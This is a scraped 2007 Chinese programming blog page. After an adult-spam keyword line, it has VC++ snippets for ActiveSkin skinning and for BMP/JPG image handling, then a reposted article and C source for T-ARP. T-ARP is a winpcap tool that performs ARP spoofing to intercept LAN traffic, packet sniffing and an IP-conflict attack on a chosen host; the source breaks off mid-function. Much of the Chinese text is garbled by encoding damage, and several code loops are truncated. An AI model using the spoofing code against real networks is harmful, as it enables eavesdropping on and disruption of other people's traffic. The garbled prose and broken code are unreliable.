亚洲精品无码成人,亚洲国产国产综合一区首页,亚洲国产精品综合久久20

PE文�g�l�构

飞鸟 — Wed, 04 Jul 2007 05:45:00 GMT

摘要: 本章提要 · PE文�g格式概述 · PE文�g�l�构 · ... 阅读全文

飞鸟 2007-07-04 13:45 发表评论

调试Release版本应用�E�序

飞鸟 — Fri, 09 Mar 2007 03:53:00 GMT

摘要: 调试 Release 版本应用�E�序引言如果在您的开发过�E�中遇到了常见的错误�Q�或许您�? ... 阅读全文

飞鸟 2007-03-09 11:53 发表评论

ActiveSkin 4.3 软�g换肤

飞鸟 — Thu, 08 Mar 2007 10:38:00 GMT

ActiveSkin 4.3 软�g换肤在VC中的实现

　　ActiveSkin是一�Ƅ��软�g更换皮肤的ActiveX控�g。它很还好的��Y件界面设计工作从�J�琐�E�序代码�~�写中解攑և�来，使得功能设计者可以专心于功能代码的实玎ͼ�而把软�g界面交给��工人员处理。提高了界面设计的工作效率，是一�U�很好的软�g设计思想�?br />
下面通过三个�C�Z��来介�l�他的一般��用�?br />
�C�Z��一�Q?/b>标准型皮肤SkinForm的对话框工程
　　在VC环境下徏立一个MFC基本对话框工�E�。在对话框的资源文�g里Dlg.rc设计对话框界面中�Q�删��d��有的按钮Buttons和标�{�Lables�Q��ƈ插入ActiveSkin的ActiveX控�g�Q�命名�ؓIDC_SKIN。右键点击ActiveSkin控�g�Q�在ActiveX属性里选择LoadSkin菜单��，可预先加载一个Skin文�g�?br />在StdAfx.h�?//{{AFX_INSERT_LOCATION}} 之前��d��以下语句�Q?

//目的是导入ActiveSkin的函数接口库�? #include #import "actskn43.ocx" no_implementation raw_interfaces_only raw_native_types using namespace ACTIVESKINLib;
接着�Q�在Dlg.cpp文�g里添加语句：
CComQIPtr m_pSkin=GetDlgItem(IDC_SKIN)->GetControlUnknown();//m_pSkin是应用程序全局量�? m_pSkin->LoadSkin(L"皮肤文�gX的�\�?);//如果ActiveSkin控�g中已有皮肤，此句可省略�? m_pSkin->ApplySkin((int)m_hWnd);
　　�~�译�q�行�Q�可以看到皮肤文件X成�ؓ了程序的�q�行界面。如果想要在�E�序�q�行时更换皮肤，那也是可以的。在对话框上建立一个Button�Q��ƈ��d��Click事�g�Q?
void CMy1Dlg::OnBNewSkin() { static char BASED_CODE szFilter[] = "ActiveSkin Files (*.skn)|*.skn||";//文�g�q��o器设�|��? CFileDialog dlg(FALSE, ".skn", NULL, OFN_HIDEREADONLY, szFilter);//Skin文�g选择�H�口�? if (dlg.DoModal() == IDOK)//Skin文�g选择成功�Q? { USES_CONVERSION; m_pSkin->LoadSkin(T2W(dlg.GetPathName()));//载入指定的Skin文�g�? m_pSkin->ApplySkin((int)m_hWnd);//使当前Skin生效�? } }
　　你会发现�q�行时主�H�口已经换肤成功了，但“关于”对话框�{�非�ȝ��口�ƈ没变化。需要在AboutDlg的OnInitDialog()事�g中加入一句：
m_pSkin->ApplySkin((int)m_hWnd);
再运行就一切Ok了！

�C�Z��二：标准皮肤SkinForm的多文档工程
　　和示例一的做法类��|��不同的只是子�H�体在ChildFrm.cpp的Create事�g中要做修改：
BOOL bRes = CMDIChildWnd::Create(lpszClassName, lpszWindowName, dwStyle, rect, pParentWnd, pContext); m_pSkin->ApplySkin((long)m_hWnd); return bRes;
�q�样��可以了�?

�C�Z��三：自由皮肤SkinFreeForm的事件操�?br />　　和上�q�的SkinForm不同�Q�SkinFreeFrom是另一�c�d��的皮肤文件方案。因此它的操作方法上��有所不同了。可以参照ActiveSkin自带样例中的DesktopColorizer一例。SkinForm和SkinFreeFrom的主要区别在于SkinApply�Ҏ��和事件的驱动方式上�?
if(FAILED(m_pSkin->LoadSkin(Temp))||　　　//均��用LoadSkin()装蝲某一Skin�Q�参数是Skin文�g的�\径名�? FAILED(m_pSkin->ApplySkinByName((long)m_hWnd, L"FreeForm"))) //SkinForm�c�d��的皮肤��用ApplySkin使其生效�Q? //�q�种方式会自动将某Skin中的所有SkinObject元素替代指定Handle的窗口�? //SkinFreeForm�c�d��的皮肤��用ApplySkinByName()使其生效�Q? //其中�W�一个参数是�H�口句柄�Q�第二个参数是SkinBuilder中一个Object的名字�? { MessageBox("Could not load or apply the skin."); PostMessage(WM_CLOSE); return FALSE; }
　　事�g驱动的区别：SkinForm换肤时不影响�E�序代码的原事�g工作方式�Q�只是界面上的换肤，因而SkinForm::ApplySkin(Handle)��OK了；但是SkinFreeForm��׃��同了�Q�它必须用一个消息�܇�Q�采用消息的方式使程序获得Skin上的事�g�Q�而且在其事�g中采用ISkinObject::GetName(BSTR *)获得相关的皮肤元素，用GetSkinnedWindow(hWnd).FindObject("Screen")来获取相应的元素句柄讄��元素状态。简单的消息泵可以通过Skin控�g上右键Event讄��q�编写�?br />　　具体实现��L��C�Z��源代码。示例在使用前请安装好ActiveSkin4.3�Q�可能还需要修改事例中Skin控�g初始的LoadSkin(Skin文�g)才能正常使用

飞鸟 2007-03-08 18:38 发表评论

bmp转JPG

飞鸟 — Tue, 27 Feb 2007 11:26:00 GMT
#define ULONG_PTR void*
#include
#include
#pragma comment(lib,"GdiPlus.lib")
using namespace Gdiplus;
int GetEncoderClsid(const WCHAR* format, CLSID* pClsid)
{
   UINT num = 0;          // number of image encoders
   UINT size = 0;         // size of the image encoder array in bytes
   GdiplusStartupInput gdiplusStartupInput;
   ULONG_PTR           gdiplusToken;
   GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL);
   ImageCodecInfo* pImageCodecInfo = NULL;
   GetImageEncodersSize(&num, &size);
   if(size == 0)
    return -1; // Failure
   pImageCodecInfo = (ImageCodecInfo*)(malloc(size));
   if(pImageCodecInfo == NULL)
    return -1; // Failure
   GetImageEncoders(num, size, pImageCodecInfo);
   for(UINT j = 0; j < num; ++j)
   {
    if( wcscmp(pImageCodecInfo[j].MimeType, format) == 0 )
    {
     *pClsid = pImageCodecInfo[j].Clsid;
     free(pImageCodecInfo);
     return j; // Success
    }
   }
   free(pImageCodecInfo);
   GdiplusShutdown(gdiplusToken);
   return -1; // Failure
}

void BMP2JPG(CString strBMPFile,CString strJPGFile)
{
    CLSID encoderClsid;
    WCHAR strGuid[39];
    if(GetEncoderClsid(L"image/jpeg", &encoderClsid) >= 0)
    StringFromGUID2(encoderClsid, strGuid, 39);
    Image image(strBMPFile.AllocSysString());
    image.Save(strJPGFile.AllocSysString(),&encoderClsid,NULL);
}

飞鸟 2007-02-27 19:26 发表评论

飞鸟 — Sun, 25 Feb 2007 13:16:00 GMT
//参数囄��路径�Q�窗口句柄，囄��宽，�?br />HRESULT ShowPic(char *lpstrFile,HWND hWnd,int nScrWidth,int nScrHeight)
{
HDC hDC_Temp=GetDC(hWnd);

IPicture *pPic;
IStream *pStm;

BOOL bResult;

HANDLE hFile=NULL;
DWORD dwFileSize,dwByteRead;

//打开��盘中的囑�Ş文�g
hFile=CreateFile(lpstrFile,GENERIC_READ,
  FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);

if (hFile!=INVALID_HANDLE_VALUE)
{
  dwFileSize=GetFileSize(hFile,NULL);//获取文�g字节�?

  if (dwFileSize==0xFFFFFFFF)
   return E_FAIL;
}
else
{
  return E_FAIL;
}

//分配全局存储�I�间
HGLOBAL hGlobal = GlobalAlloc(GMEM_MOVEABLE, dwFileSize);
LPVOID pvData = NULL;

if (hGlobal == NULL)
  return E_FAIL;

if ((pvData = GlobalLock(hGlobal)) == NULL)//锁定分配内存�?
  return E_FAIL;

ReadFile(hFile,pvData,dwFileSize,&dwByteRead,NULL);//把文件读入内存缓冲区

GlobalUnlock(hGlobal);

CreateStreamOnHGlobal(hGlobal, TRUE, &pStm);

//装入囑�Ş文�g
bResult=OleLoadPicture(pStm,dwFileSize,TRUE,IID_IPicture,(LPVOID*)&pPic);

if(FAILED(bResult))
  return E_FAIL;

OLE_XSIZE_HIMETRIC hmWidth;//囄��的真实宽�?
OLE_YSIZE_HIMETRIC hmHeight;//囄��的真实高�?
pPic->get_Width(&hmWidth);
pPic->get_Height(&hmHeight);

//��图形输出到屏幕上（有点像BitBlt�Q?
bResult=pPic->Render(hDC_Temp,0,0,nScrWidth,nScrHeight,
  0,hmHeight,hmWidth,-hmHeight,NULL);

pPic->Release();

CloseHandle(hFile);//关闭打开的文�?

if (SUCCEEDED(bResult))
{
  return S_OK;
}
else
{
  return E_FAIL;
}
}

飞鸟 2007-02-25 21:16 发表评论

飞鸟 — Fri, 23 Feb 2007 13:08:00 GMT
void SaveBmp(HBITMAP hbmp, LPCTSTR sIconFileName)
{
if(hbmp==NULL || sIconFileName==NULL)
return;
//warning: this code snippet is not bullet proof.
//do error check by yourself [masterz]
PICTDESC picdesc;
picdesc.cbSizeofstruct = sizeof(PICTDESC);
picdesc.picType = PICTYPE_BITMAP ;
picdesc.bmp.hpal = NULL;
picdesc.bmp.hbitmap = hbmp;
IPicture* pPicture=NULL;
OleCreatePictureIndirect(&picdesc, IID_IPicture, TRUE,(VOID**)&pPicture);
LPSTREAM pStream;
CreateStreamOnHGlobal(NULL,TRUE,&pStream);
LONG size;
HRESULT hr=pPicture->SaveAsFile(pStream,TRUE,&size);
char pathbuf[1024];
strcpy(pathbuf,sIconFileName);
CFile iconfile;
iconfile.Open(pathbuf, CFile::modeCreate|CFile::modeWrite);
LARGE_INTEGER li;
li.HighPart =0;
li.LowPart =0;
ULARGE_INTEGER ulnewpos;
pStream->Seek( li,STREAM_SEEK_SET,&ulnewpos);
ULONG uReadCount = 1;
while(uReadCount>0)
{

pStream->Read(pathbuf,sizeof(pathbuf),&uReadCount);
if(uReadCount>0)
iconfile.Write(pathbuf,uReadCount);
}
pStream->Release();
iconfile.Close();
}

void CsaveviewView::OnSaveview()
{
CClientDC dc(this);
CDC dcmem;
dcmem.CreateCompatibleDC(&dc);
CBitmap bmp;
CRect rc;
GetClientRect(&rc);
bmp.CreateCompatibleBitmap(&dc,rc.Width(),rc.Height());
dcmem.SelectObject(&bmp);
dcmem.BitBlt(0,0,rc.Width(),rc.Height(),&dc,0,0,SRCCOPY);
SaveBmp(bmp,"c:\\a.bmp");
}

飞鸟 2007-02-23 21:08 发表评论

飞鸟 — Sun, 18 Feb 2007 03:32:00 GMT
详谈调用winpcap驱动写arp多功能工�?br />
Author: TOo2y[原创]
E-mail: TOo2y@safechina.net
Homepage: www.safechina.net
Date: 11-9-2002

一 winpcap驱动��?br />�?Packet.dll相关数据�l�构及函�?br />�?T-ARP功能及原理介�l?br />�?T-ARP主要代码分析
�?T-ARP源代�?br />
一�Q�winpcap驱动��?br />    winpcap(windows packet capture)是windows�q�_��下一个免费，公共的网�l�访问系�l�。开发winpcap�q�个��目的目的在于�ؓwin32应用�E�序提供讉K��|�络底层的能力。它提供了以下的各项功能�Q?br />    1> 捕获原始数据报，包括在共享网�l�上各主机发�?接收的以及相互之间交换的数据报；
    2> 在数据报发往应用�E�序之前�Q�按照自定义的规则将某些�Ҏ��的数据报�q��o掉；
    3> 在网�l�上发送原始的数据报；
    4> 攉��|�络通信�q�程中的�l�计信息�?br />
    winpcap的主要功能在于独立于��L��协议�Q�如TCP-IP)而发送和接收原始数据报。也��是��_��winpcap不能��d��Q�过滤或控制其他应用�E�序数据报的发收�Q�它仅仅只是监听�׃�n�|�络上传送的数据报。因此，它不能用于QoS调度�E�序或个人防火墙�?br />
    目前�Q�winpcap开发的主要对象是windows NT/2000/XP�Q�这主要是因为在使用winpcap的用户中只有一��部分是仅��用windows 95/98/Me�Q��ƈ且M$也已�l�放弃了对win9x的开发。因此本文相关的�E�序T-ARP也是面向NT/2000/XP用户的。其实winpcap中的面向9x�pȝ��的概念和NT�pȝ��的非常相��|��只是在某些实��C��有点差异�Q�比如说9x只支持ANSI�~�码�Q�而NT�pȝ��则提倡��用Unicode�~�码�?br />
    本文讨论的是packet.dll所提供的各�U�函敎ͼ�因�ؓ它们完全可以实现本文所希望的各��要求。但是如果你有其他特别的或更高��的要求，winpcap也提供了另一个动态连接库wpcap.dll。虽然wpcap.dll依靠于packet.dll,但是它却提供了一�U�更��单，直接�Q�有力的�Ҏ��来更好的利用�~�程环境。比如捕获一个数据报�Q�创��Z��个数据报�q��o装置或将监听到的数据报�{存到某个文�g�{�，wpcap.dll都会��Z��提供更加安全的实现方法�?br />
二）Packet.dll相关数据�l�构及函敊W��?br />    本文的目的之一在于介绍如何利用winpcap驱动写ARP工具�Q�因此有必要介绍一些相关的数据�l�构和函敎ͼ�要不然看着一行行代码和函敎ͼ�也许会有些不知所云�?br />
    首先介绍一些相关的数据�l�构�Q?br />      1. typedef struct _ADAPTER  ADAPTER  //描述一个网�l�适配器；
      2. typedef struct _PACKET PACKET     //描述一�l�网�l�数据报的结构；
      3. typedef struct NetType NetType    //描述�|�络�c�d��的数据结构；
      4. typedef struct npf_if_addr npf_if_addr  //描述一个网�l�适配器的ip地址�Q?br />      5. struct bpf_hdr   //数据报头部；
      6. struct bpf_stat  //当前捕获数据报的�l�计信息�?br />
    下面�Q�将介绍T-ARP用到的各个函敎ͼ�他们都是在packet.dll中定义的�Q?br />    1>  LPPACKET PacketAllocatePacket(void)
        如果�q�行成功�Q�返回一个_PACKET�l�构的指针，否则�q�回NULL。成功返回的�l�果��会传送到PacketReceivePacket()函数�Q�接收来自驱动的�|�络数据报�?br />
    2>  VOID PacketCloseAdapter(LPADAPTER lpAdapter)
        关闭参数中提供的�|�络适配器，释放相关的ADAPTER�l�构�?br />
    3>  VOID PacketFreePacket(LPPACKET lpPacket)
        释放参数提供的_PACKET�l�构�?br />
    4>  BOOLEAN PacketGetAdapterNames(LPSTR pStr,PULONG BufferSize)
        �q�回可以得到的网�l�适配器列表及描述�?br />
    5>  BOOLEAN PacketGetNetInfoEx(LPTSTR AdapterNames,npf_ip_addr *buff, PLONG NEntries)
        �q�回某个�|�络适配器的全面地址信息�?br />        其中npf_ip_addr�l�构包含�Q�IPAddress,SubnetMask,Broadcast
        IPAddress: ip地址
        SubnetMask: 子网掩码
        Broadcast: �q�播地址

    6>  BOOLEAN PacketGetNetType(LPADAPTER AdapterObject, NetType *type)
        �q�回某个�|�络适配器的MAC�c�d��?br />        NetType�l�构里包含了LinkSpeed(速度�Q�和LinkType(�c�d��Q�。其中LinkType包含以下几种情况�Q?br />          NdisMedium802_3: Ethernet(802.3)
          NdisMediumWan: WAN
          NdisMedium802_5: Token Ring(802.5)
          NdisMediumFddi: FDDI
          NdisMediumAtm: ATM
          NdisMediumArcnet878_2: ARCNET(878.2)

    7>  BOOLEAN PacketGetStats(LPADAPTER AdapterObject,struct bpf_stat *s)
        �q�回几个关于当前捕获报告的统计信息�?br />        其中bpf_stat�l�构包含�Q�bs_recv, bs_drop,ps_ifdrop,bs_capt
          bs_recv: 从网�l�适配器开始捕��h��据报开始所接收到的所有数据报的数目，包括丢失的数据报�Q?br />          bs_drop: 丢失的数据报数目。在驱动�~�冲区已�l�满�Ӟ��׃��发生数据报丢��q��情况�?br />
    8>  PCHAR PacketGetVersion()
        �q�回关于dll的版本信息�?br />
    9>  VOID PacketInitPacket(LPPACKET lpPacket, PVOID Buffer, UINT Length)
        初始化一个_PACKET�l�构�?br />
    10> LPADAPTER PacketOpetAdapter(LPTSTR AdapterName)
        打开一个网�l�适配器�?br />
    11> BOOLEAN PacketReceivePacket(LPADAPTER AdapterObject,LPPACKET lpPacket,BOOLEAN Sync)
        从NPF驱动�E�序��d��|�络数据报及�l�计信息�?br />        数据报编码结构： |bpf_hdr|data|Padding|bpf_hdr|data|Padding|

    12> BOOLEAN PacketSendPacket(LPADAPTER AdapterObject,LPPACKET lpPacket, BOOLEAN Sync)
        发送一个或多个数据报的副本�?br />
    13> BOOLEAN PacketSetBuff(LPADAPTER AdapterObject,int dim)
        讄��捕获数据报的内核�U�缓冲区大小�?br />
    14> BOOLEAN PacketSetHwFilter(LPADAPTER AdapterObject,ULONG Filter)
        为接收到的数据报讄��g�q��o规则�?br />        以下��Z��些典型的�q��o规则�Q?br />          NDIS_PACKET_TYPE_PROMISCUOUS: 讄��为�؜杂模式，接收所有流�q�的数据报；
          NDIS_PACKET_TYPE_DIRECTED: 只有目的��Cؓ本地��L��|�络适配器的数据报才会被接收�Q?br />          NDIS_PACKET_TYPE_BROADCAST: 只有�q�播数据报才会被接收�Q?br />          NDIS_PACKET_TYPE_MULTICAST: 只有与本��C��机网�l�适配器相对应的多播数据报才会被接�Ӟ��
          NDIS_PACKET_TYPE_ALL_MULTICAST: 所有多播数据报均被接收�Q?br />          NDIS_PACKET_TYPE_ALL_LOCAL: 所有本地数据报均被接收�?br />
    15> BOOLEAN PacketSetNumWrites(LPADAPTER AdapterObject,int nwrites)
        讄��调用PacketSendPacket()函数发送一个数据报副本所重复的次数�?br />
    16> BOOLEAN PacketSetReadTimeout(LPADAPTER AdapterObject,int timeout)
        讄��在接收到一个数据报后“休息”的旉��?br />
    以上��是T-ARP所调用的各个函敎ͼ�它包含了packet.dll里的大部分函数。如果你��x��深层的了解winpcap,误��问相关网站，主页地址�Q?http://winpcap.polito.it

三）T-ARP功能及原理介�l?br />    准备工作�Q� �?br />      1. 安装winpcap驱动�Q�目前最新的版本为winpcap_3.0_alpha, �E�_��版本为winpcap_2.3�Q?br />      2. 使用ARP�ƺ骗功能前，必须启动ip路由功能�Q�修�?��d��)注册表选项�Q?br />　　  　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1　

    选项:
      -m  ��L��扫描�Q�获得局域网内指定ip�D�中存活��L��的ip地址和mac地址�Q?br />      -a  反嗅探扫描，获得局域网内指定ip�D�中嗅探��L��的ip地址和mac地址�Q?br />      -s  ARP�ƺ骗�Q�欺骗局域网内指定的两台��L��Q��其相互发送接收的数据报均通过本地��L��Q?br />          �|�络嗅探�Q�如果你选择�ƺ骗的两��C��机均是本��C��机，那么��会监听到所有流�q�本��C��机的数据报；
          IP冲突�Q�如果你选择�ƺ骗的两��C��机是同一台非本地��L��Q�那么就会发起ip冲突��d��Q?br />      -r  重置被欺骗主机，使被�ƺ骗的两��C��机恢复正常的工作状态�?br />
    原理及实现过�E�：
      无论什么选项�Q�第一件事��是获得本地��L��的mac地址及相关网�l�设�|�。我们以一个特�D�的ip地址(112.112.112.112)向本��C��机发送一个ARP Request(ARP��h��)数据报，当本��C��机接收到后，��׃��发送一个ARP Reply(ARP应答)数据报来回应��h��Q�这��h��们就可以获得本地��L��的mac地址了。至于相关的�|�络讄��可以通过PacketGetNetInfoEx()和PacketGetNetType()获得�?br />
      -m  以本��C��机的名义(本地��L��的ip和mac)向指定ip�|�段内的所有主机发送广�?ff:ff:ff:ff:ff:ff)ARP Request数据报，存活的主机就会发送ARP Reply数据报，�q�样��可以获得当前存�z�M��机的列表。因为在很多�|�关上都对ARP Request做了限制--非内�|�ip发送的ARP Request数据报不会得到网关的回应�Q�如果你用内�|�的其他某台��L��的ip来发送ARP Request数据报，如果填写的mac地址和相应的ip不合�Q�就会出现ip冲突。所以最好还是用自己的ip和mac地址来发送请求�?br />
      -a  以本��C��机的名义(本地��L��的ip和mac)向指定ip�|�段内的所有主机发�?1位伪�q�播地址(ff:ff:ff:ff:ff:fe)的ARP Request数据报，只有正在嗅探的主机才会发送ARP Reply数据报，�q�样��可以获得当前存�z�M��机的列表。嗅探中的win2000�pȝ��q�会�?6位伪�q�播地址(ff:ff:00:00:00:00)做出回应�Q�而嗅探中的win95/98/me不仅会回�?6位伪�q�播地址�Q�而且也会回应8位伪�q�播地址(ff:00:00:00:00:00)�Q��?NIX�pȝ��对各�U�广播地址所做出的反应却有些不同。在此我们选择31位伪�q�播地址�Q�是因�ؓ�l�大多数的系�l�在嗅探旉��会对它做出回应。而正常状况下的各�U�系�l�，都不会对31位伪�q�播地址做出回应�?br />
      -s (ARP�ƺ骗spoof) 需要强调的是在某些局域网(如以太网)内，数据报的发送与接收是基于硬件地址的，�q�是我们实现�ƺ骗的基��。首先获得指定的两台��L��(假设�?A �?B)的mac地址�Q�然后向A发送ARP Reply数据报，其中的源ip地址为B的ip地址�Q�但是源mac地址却是本地��L��的mac地址�Q�这样主机A��׃��认�ؓ��L��B的mac地址是本��C��机的mac地址�Q�所以主机A发送到��L��B的数据报都发送到本地��L��了。同理向��L��B发送ARP Reply数据报，通知它主机A的mac地址为本��C��机的mac地址。这样主机A和主机B��׃��把目的主机的mac地址理解为本��C��机的mac地址�Q�于是他们之间相互发送的数据报都首先到达了本��C��机，而先前我们已�l�将本地��L��讄��了ip路由功能�Q�系�l�会自动��数据报转发到真正的目的��L��。其��_��你就可以监听它们通信的各�U�数据报了�?br />
      -s (�|�络嗅探sniff) 如果指定的两个目的主机均为本��C��机，那么��只是将�|�络适配器设�|��ؓ��h��模式�Q�这样就可以监听到流�q�本��C��机网�l�适配器的各种数据�?br />
      -s (ip冲突shock�Q?如果你选择�ƺ骗的两��C��机是同一台非本地��L��(假如是主机C)�Q�那么就会不断地向主机C发送ARP Reply数据报，报文中的源ip地址��是��L��C的ip地址�Q�但是源mac地址却是本地��L��的mac地址�Q�因此主机C��׃��发现有另一��C��机同时拥有和自己相同的ip�Q�这��是ip冲突��d��。如果是非xp�pȝ��,都会跛_��一个ip冲突的提�C�窗口，而xp�pȝ��也会有类似的警告。但是请注意�Q�在��L��C的系�l�事件查看器中，会留下本��C��机的mac地址与之冲突的恶心记录，所以你最好不要滥用这个功能�?br />
      -r  在实��C��ARP�ƺ骗的情况下�Q�向��L��A和B发送ARP Reply数据报，通知��L��A(B)注意��L��B(A)的mac地址��Z��机B(A)自己的mac地址�Q�这样主机A和B��׃��更新他们的ARP�~�存�Q�实现正常的数据通信�?br />
四）T-ARP主要代码分析
    1> 自定义函敎ͼ�
      int getmine()    //发送ARP Request数据报，��h��获得本地��L��的mac地址�Q?br />      void getdata(LPPACKET lp,int op)  //分类处理接收到的数据报；
      DWORD WINAPI sniff(LPVOID no)     //��网�l�适配器设�|��ؓ��h��模式�Q�接收所有流�q�的数据报；
      DWORD WINAPI sendMASR(LPVOID no)  //发送ARP Request数据报，��h��获得指定ip的mac地址�Q?br />      DWORD WINAPI sendSR(LPVOID no)    //发送ARP Reply�q�行ARP�ƺ骗�Q�或是更��C��机的ARP�~�存�?br />
    2> 主要代码分析
      printf("\nLibarary Version: %s",PacketGetVersion());  //输出dll的版本信息；

      PacketGetAdapterNames((char *)adaptername,&adapterlength)  //获得本地��L��的网�l�适配器列表和描述�Q?br />
      lpadapter=PacketOpenAdapter(adapterlist[open-1]);  //打开指定的网�l�适配器；

      PacketGetNetType(lpadapter,&ntype)  //获得�|�络适配器的MAC�c�d��Q?br />
      PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen)  //获得指定�|�络适配器的相关信息�Q?br />
      rthread=CreateThread(NULL,0,sniff,(LPVOID)&opti,0,&threadrid);  //创徏一个新�U�程来监听网�l�数据报�Q?br />
      PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS)  //��网�l�适配器设�|��ؓ��h��模式�Q�这��h��可以监听��过本地��L��的数据报�Q?br />      PacketSetBuff(lpadapter,500*1024)  //自定义网�l�适配器的内核�~�的大小�?500*1024�Q?br />
      PacketSetReadTimeout(lpadapter,1)  //讄��接收一个数据报后等待的旉��?毫秒�Q?br />
      PacketReceivePacket(lpadapter,lppacketr,TRUE)  //在设�|��ؓ��h��模式后，接收所有的数据报；

      sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);
      sthread=CreateThread(NULL,0,sendSR,(LPVOID)&opti,0,&threadsid);  //创徏一个新�U�程发送特定的ARP数据�?br />
      PacketSetNumWrites(lpadapter,2)  //在发送一个数据报�Ӟ��重复发送两�ơ；

      PacketSendPacket(lpadapter,lppackets,TRUE)  //发送自定义数据报；

      WaitForSingleObject(sthread,INFINITE);  //�{�待发送ARP数据报的�U�程�l�束�Q?br />
      PacketGetStats(lpadapter,&stat)  //获得�|�络适配器的�l�计信息�Q?br />
�? T-ARP源代�?br />
#include
#include
#include
#include

#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")

#define ETH_IP       0x0800
#define ETH_ARP      0x0806
#define ARP_REQUEST  0x0001
#define ARP_REPLY    0x0002
#define ARP_HARDWARE 0x0001
#define max_num_adapter  10

#pragma pack(push,1)

typedef struct ethdr
{
    unsigned char   eh_dst[6];
    unsigned char   eh_src[6];
    unsigned short  eh_type;
}ETHDR,*PETHDR;

typedef struct arphdr
{
    unsigned short  arp_hdr;
    unsigned short  arp_pro;
    unsigned char   arp_hln;
    unsigned char   arp_pln;
    unsigned short  arp_opt;
    unsigned char   arp_sha[6];
    unsigned long   arp_spa;
    unsigned char   arp_tha[6];
    unsigned long   arp_tpa;
}ARPHDR,*PARPHDR;

typedef struct iphdr
{
    unsigned char  h_lenver;
    unsigned char  tos;
    unsigned short total_len;
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char  ttl;
    unsigned char  proto;
    unsigned short checksum;
    unsigned int   sourceip;
    unsigned int   destip;
}IPHDR,*PIPHDR;

#pragma pack(push)

LPADAPTER lpadapter=0;
LPPACKET  lppacketr,lppackets;
ULONG     myip,firstip,secondip;
UCHAR     mmac[6]={0},fmac[6]={0},smac[6]={0};
BOOL      mm=FALSE,fm=FALSE,sm=FALSE;
FILE      *fp;
char      adapterlist[max_num_adapter][1024];
char      msg[50];
int       num=0;

void start()
{
    printf("T-ARP --- ARP Tools, by TOo2y(ò1é?), 11-9-2002\n");
    printf("Homepage: www.safechina.net\n");
    printf("E-mail: TOo2y@safechina.net\n");
    return ;
}

void usage()
{
    printf("\nUsage: T-ARP  [-m|-a|-s|-r]  firstip  secondip  \n\n");
    printf("Option:\n");
    printf("   -m  mac        Get the mac address from firstip to secondip\n");
    printf("   -a  antisniff  Get the sniffing host from firstip to secondip\n");
    printf("   -s  spoof      1> Spoof the host between firstip and secondip\n");
    printf("       sniff      2> Sniff if firstip == secondip == your own ip\n");
    printf("       shock      3> Shock if firstip == secondip != your own ip\n");
    printf("   -r  reset      Reset the spoofed host work normally\n\n");
    printf("Attention:\n");
    printf("    1> You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");
    printf("    2> HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\IPEnableRouter==0x1\n\n");
    return ;
}

int getmine()
{
    char   sendbuf[1024];
    int    k;
    ETHDR  eth;
    ARPHDR arp;

    for(k=0;k<6;k++)
    {
        eth.eh_dst[k]=0xff;
        eth.eh_src[k]=0x82;
        arp.arp_sha[k]=0x82;
        arp.arp_tha[k]=0x00;
    }
    eth.eh_type=htons(ETH_ARP);
    arp.arp_hdr=htons(ARP_HARDWARE);
    arp.arp_pro=htons(ETH_IP);
    arp.arp_hln=6;
    arp.arp_pln=4;
    arp.arp_opt=htons(ARP_REQUEST);
    arp.arp_tpa=htonl(myip);
    arp.arp_spa=inet_addr("112.112.112.112");

    memset(sendbuf,0,sizeof(sendbuf));
    memcpy(sendbuf,ð,sizeof(eth));
    memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

    PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));
    if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)
    {
        printf("PacketSendPacket in getmine Error: %d\n",GetLastError());
        return -1;
    }
    return 0;
}

void getdata(LPPACKET lp,int op)
{
    ULONG  ulbytesreceived,off,tlen,ulen,ulLines;
    ULONG  j,k;
    ETHDR  *eth;
    ARPHDR *arp;
    PIPHDR ip;
    char   *buf,*pChar,*pLine,*base;
    struct bpf_hdr      *hdr;
    struct sockaddr_in  sin;

    ulbytesreceived=lp->ulBytesReceived;
    buf=(char *)lp->Buffer;

    off=0;
    while(off    {
        if(kbhit())
        {
            return ;
        }
        hdr=(struct bpf_hdr *)(buf+off);
        off+=hdr->bh_hdrlen;

        pChar=(char *)(buf+off);
        base=pChar;
        off=Packet_WORDALIGN(off+hdr->bh_caplen);

        eth=(PETHDR)pChar;
        arp=(PARPHDR)(pChar+sizeof(ETHDR));

        if(eth->eh_type==htons(ETH_IP))
        {
                    ip=(PIPHDR)(pChar+sizeof(ETHDR));

            if(fm && sm && (op==3))
            {
                if((((ip->sourceip!=htonl(myip)) && (ip->destip!=htonl(myip))
                                && !strcmp((char *)eth->eh_dst,(char *)mmac))
                && ((ip->sourceip==htonl(firstip)) || (ip->destip==htonl(firstip))
                || (ip->sourceip==htonl(secondip)) || (ip->destip==htonl(secondip))))
                                || ((firstip==myip) && (secondip==myip)))
                {
                    memset(msg,0,sizeof(msg));

                    sin.sin_addr.s_addr=ip->sourceip;
                    printf("[IP:]%16s ---> [IP:]",inet_ntoa(sin.sin_addr));

                                        strcpy(msg,inet_ntoa(sin.sin_addr));
                    strcat(msg+15," ---> ");

                    sin.sin_addr.s_addr=ip->destip;
                    printf("%16s\n",inet_ntoa(sin.sin_addr));

                    strcat(msg+23,inet_ntoa(sin.sin_addr));
                    fseek(fp,-2,1);
                    fwrite("\r\n\r\n\r\n",6,1,fp);
                    fwrite(msg,38,1,fp);
                    fwrite("\r\n",2,1,fp);

                    ulLines=(hdr->bh_caplen+15)/16;
                    for(k=0;k                    {
                        pLine=pChar;
                        printf("%08lx : ",pChar-base);

                        ulen=tlen;
                        ulen=(ulen>16) ? 16 : ulen;
                        tlen-=ulen;

                        for(j=0;j                            printf("%02x ",*(BYTE *)pChar++);

                        if(ulen<16)
                            printf("%*s",(16-ulen)*3," ");

                        pChar=pLine;

                        for(j=0;j                        {
                            printf("%c",isprint(*pChar)? *pChar : '.');
                            fputc(isprint(*pChar) ? *pChar : '.',fp);
                        }
                        printf("\n");
                    }
                    printf("\n");
                                        fwrite("\r\n",2,1,fp);
                }

